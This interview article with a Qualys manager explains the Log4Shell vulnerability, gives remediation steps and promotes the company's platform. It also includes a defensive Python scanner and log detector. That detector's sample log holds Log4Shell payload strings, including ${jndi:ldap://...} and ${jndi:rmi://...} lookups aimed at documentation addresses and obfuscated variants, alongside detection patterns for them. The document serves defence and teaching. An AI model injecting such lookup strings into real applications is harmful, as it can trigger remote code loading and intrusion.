A critical zero-day vulnerability in Apache Log4j 2, a widely used Java logging library, was publicly disclosed on December 9, 2021 and assigned CVE-2021-44228. The flaw was soon given a name: Log4Shell.
CSA sat down with Steven Gan, Country Manager at Qualys - Southeast Asia, to talk more about Log4Shell and why it’s here to stay. He explained, “Log4Shell is going to be a vulnerability that young kids today, if they choose to pursue a career in cybersecurity, will still be dealing with fifteen years from now.”
The Need to Stamp out Flaws Like Log4Shell
The reason is scale: there are an estimated 12 million Java developers worldwide and some 15 billion devices running Java. According to Steven, Apache Log4j is one of the most used logging libraries in the world, but the exact percentage of Java applications that use it is unknown.
The scope of risk is unprecedented. Because the flaw sits in a library rather than in a single product, it affects every type of organisation across all industries.
“A vulnerability such as Log4Shell is not one that any security professional could have necessarily predicted or avoided. However, it does underscore that nearly every enterprise environment contains open-source applications. Yet, organisations are still struggling with the challenges of managing out-of-date code and high-risk vulnerabilities,” he added.
Although open-source applications were the most exposed, the vulnerable library was also found embedded in cloud workloads and container images. Hence, enterprises must continue to monitor containers for flaws like Log4Shell, not just the applications they build themselves.
“Managing one application and its data in a cloud environment may be simple but it is nearly impossible to manage dozens of applications in multiple cloud environments with disparate management tools. Without careful planning and the right tools, companies can spend more time managing cloud infrastructure than benefiting from it,” Steven explained.
When monitoring running containers and cloud workloads for flaws such as Log4Shell, he added, organisations need to invest in a platform approach that orchestrates consistent security controls across a multi-cloud environment, saving security teams time and increasing efficiency. Given today’s threat landscape and severe vulnerabilities such as Log4Shell, Steven considers this a must-have for every organisation’s cyber arsenal.
Taking Pre-Emptive Measures
Interestingly, when Log4Shell was detected in more than 2,800 publicly facing web applications, the industry responded with an ‘all hands on deck’ approach to prevent attackers from breaking into their environments via the vulnerability. The threat was so severe that in one instance, Steven stated, a Fortune 50 global manufacturing company’s CISO gave the directive to take all servers completely offline if the flaw could not be remediated within days.
Qualys was one of the first industry players to analyse the threat and develop effective countermeasures, including:
Within 24 hours, Qualys had published its findings and launched a Log4Shell resource centre to keep the industry updated.
Qualys released over 70 vulnerability detections and continued to release more as vendors released patches.
Qualys hosted webcasts for customers and non-customers alike on the recommended remediation steps.
And many more!
When asked what organisations can do to mitigate this vulnerability or eliminate it entirely, he said that, as with most vulnerabilities, understanding how and where the flaw affects your business is crucial.
Confronting Log4Shell in your environment is anything but easy, given how widely Log4j is embedded in Java applications. Yet while Log4Shell is one of the most serious vulnerabilities ever discovered, remediating it is more tractable than one might think.
“The answer? Upgrades and patches,” said Steven.
STEP 1 - Understand Your External Attack Surface: Quickly scan external attack surfaces (public-facing websites and applications) to identify where the flaw is reachable, by submitting the same lookup strings an attacker would in headers, parameters and form fields and watching for the resulting outbound DNS or LDAP callbacks.
STEP 2 - Find Where You Are Vulnerable and Prioritise: A big challenge introduced by this vulnerability is detecting it. As Log4Shell may affect any Java application that uses a vulnerable version of Log4j, it is important to take a multi-layered approach using asset management, vulnerability management and container scanning tools. Version strings in file names are not enough: log4j-core is routinely bundled or shaded inside other jars, wars and fat jars, so scanning has to look inside archives.
STEP 3 - Remediation: Once your higher priority vulnerable applications are identified, begin their remediation. Different remediation methods will be required because Log4Shell may affect every Java-based application, and each should be based on the application’s type and function. The durable fix is to upgrade log4j-core to a fixed release; where an upgrade is not immediately possible, removing the JndiLookup class from the jar closes the JNDI path. The early advice to set the formatMsgNoLookups flag proved incomplete (CVE-2021-45046) and should not be relied on by itself.
STEP 4 - Detect Exploits: Due to the complexity of detecting and remediating this vulnerability, organisations must continue to detect exploit attempts in real time. Attempts leave recognisable traces: ${jndi: lookup strings in request headers, URLs and form fields, often URL-encoded or hidden behind nested lookups, followed by outbound LDAP, RMI or DNS connections from the application host.
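The procedure above, as an added example that is not code from the article or from Qualys: a self-contained Python script covering the "find where you are vulnerable" part of step 2 (walking a directory tree for log4j-core, including copies nested inside war and ear files, and reporting each copy as vulnerable, fixed, or mitigated by removal of JndiLookup.class) and the "detect exploits" part of step 4 (classifying web access-log lines as Log4Shell probes after undoing the URL-encoding and nested-lookup tricks attackers used). The jar contents, directory layout and log lines are constructed for the demo; the affected version ranges are those published in the Apache Log4j security advisories.

```python
"""Added example (not code from the article or from Qualys): steps 2 and 4 above
in plain Python. find_log4j() opens every .jar/.war/.ear under a directory, jars
nested inside wars/ears included, spots log4j-core, reads its version and checks
whether JndiLookup.class is still there. is_jndi_probe() flags an access-log line
carrying a ${jndi:...} lookup after undoing URL-encoding and ${lower:}/${::-x}
nesting tricks. The sample jars and log lines below are constructed for the demo."""
import io, os, re, tempfile, zipfile
from urllib.parse import unquote

CORE = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE + "lookup/JndiLookup.class"
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def version_status(version):
    """Affected: 2.0-beta9..2.14.1 (CVE-2021-44228), 2.15.0 in some configs
    (CVE-2021-45046); Java 7 branch fixed from 2.12.2, Java 6 branch from 2.3.1;
    1.x has no JNDI lookup. 2.0 betas before beta9 are deliberately over-flagged."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m:
        return "unknown"
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    if major != 2:
        return "not_affected" if major == 1 else "unknown"
    if minor == 3:
        return "vulnerable" if patch < 1 else "fixed"
    if minor == 12:
        return "vulnerable" if patch < 2 else "fixed"
    return "vulnerable" if minor <= 15 else "fixed"


def inspect_archive(zf, label, findings, depth=0):
    """Record a finding if this zip is log4j-core, then recurse into nested jars."""
    names = set(zf.namelist())
    if any(n.startswith(CORE) for n in names):
        props = zf.read(POM).decode("utf-8", "replace") if POM in names else ""
        m = re.search(r"^version=(.+)$", props, re.M)  # Maven metadata, if kept
        version = m[1].strip() if m else "unknown"
        status = version_status(version)
        if status == "vulnerable" and JNDI_CLASS not in names:
            status = "mitigated"  # JndiLookup.class deleted: the Apache workaround
        findings.append({"path": label, "version": version, "status": status})
    for n in names if depth < 3 else ():  # ear > war > jar > shaded jar is enough
        if n.lower().endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(n))) as inner:
                    inspect_archive(inner, f"{label}!{n}", findings, depth + 1)
            except zipfile.BadZipFile:
                pass


def find_log4j(root):
    """One finding per log4j-core copy under root, nested copies included."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            path = os.path.join(dirpath, f)
            if f.lower().endswith(ARCHIVES) and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path, findings)
    return findings


# step 4: innermost ${lower:x}/${upper:x} and ${...:-x} lookups are used to hide "jndi"
_INNER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def is_jndi_probe(line):
    """True if the line carries a ${jndi:...} lookup, however it was obfuscated."""
    text, prev = unquote(unquote(line)), None  # single or double URL-encoding
    while prev != text:  # peel one nesting level per pass; the string only shrinks
        prev = text
        text = _INNER.sub(lambda m: m[1] if m[1] is not None else m[2], text)
    return bool(_JNDI.search(text.lower()))


def _core_jar(dest, version, with_jndi=True):  # constructed stand-in for a real jar
    with zipfile.ZipFile(dest, "w") as z:
        z.writestr(POM, f"version={version}\n")
        z.writestr(CORE + "Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return dest


def demo_scan():
    """Build a demo tree (vulnerable, stripped, nested fixed and nested vulnerable
    jars) and return {jar file name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = os.path.join(tmp, "lib")
        os.mkdir(lib)
        _core_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
        _core_jar(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)
        with zipfile.ZipFile(os.path.join(tmp, "app.war"), "w") as war:
            for v in ("2.17.1", "2.12.1"):
                war.writestr(f"WEB-INF/lib/log4j-core-{v}.jar",
                             _core_jar(io.BytesIO(), v).getvalue())
        return {os.path.basename(f["path"].rsplit("!", 1)[-1]): f["status"]
                for f in find_log4j(tmp)}


SAMPLE_LOG = [  # constructed combined-format lines; RFC 5737 documentation addresses
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.6 - - [10/Dec/2021:14:02:12 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.99%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.99:1099/x}"',
    '198.51.100.2 - - [10/Dec/2021:14:03:00 +0000] "GET /search?q=%24100+tv HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/Dec/2021:14:03:05 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]
```

demo_scan() returns the per-jar verdicts for the constructed tree (the 2.14.1 copy is vulnerable, the copy with JndiLookup.class removed is mitigated, and inside the war the 2.17.1 copy is fixed while the 2.12.1 copy is vulnerable); running is_jndi_probe over SAMPLE_LOG flags the first three lines and leaves the two benign ones alone. Two caveats: the log detector is string-based and only undoes the lower/upper and default-value nesting tricks that were common in the wild, so it complements rather than replaces watching for outbound LDAP, RMI and DNS connections from application hosts; and a jar that has lost its Maven pom.properties is reported with version "unknown" and still needs a manual look.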
Why Organisations Need a Software Bill of Materials (SBOM)
An SBOM is similar to the ingredients list on a processed food item: it enumerates the components of a software package, so that when a component is found to be vulnerable a business can tell quickly whether, and where, it is exposed.
“Organisations who cannot get a holistic view of their assets and create a software bill of materials for everything in their environment are at significant risk of exploitation. This risk may begin forcing these organisations to take entire systems offline,” said Steven. “With a vulnerability like Log4Shell, the only actions organisations can take are to hunt for the vulnerability, review the criticality of their assets and understand their exposure to the internet.”
While an SBOM often serves as an organisation’s first visibility into the software supply chain, it is not the entire solution. As Steven put it, an SBOM simply provides the "list of ingredients"; organisations then need to learn how to consume and analyse that data quickly.
According to him, organisations typically have an incomplete picture of their assets, do not understand the key risk context and leave open security gaps that cyber criminals can exploit. Security teams need a way to go beyond a static asset inventory or a simple “list of ingredients” and understand the security context: which assets run the vulnerable component, how critical they are, and whether they are reachable from the internet.
Companies need to simplify their strategies and move away from siloed and disparate point solutions to succeed in today’s tumultuous threat landscape. That’s where a company like Qualys can help.
The Qualys vision is to simplify cybersecurity for everyone and give organisations one platform and one agent. Qualys Cloud Platform gives you a continuous, always-on assessment of your global IT, security and compliance posture, with 2-second visibility across all your IT assets, wherever they reside. And with automated, built-in threat prioritisation, patching and other response capabilities, it is a complete, end-to-end security solution.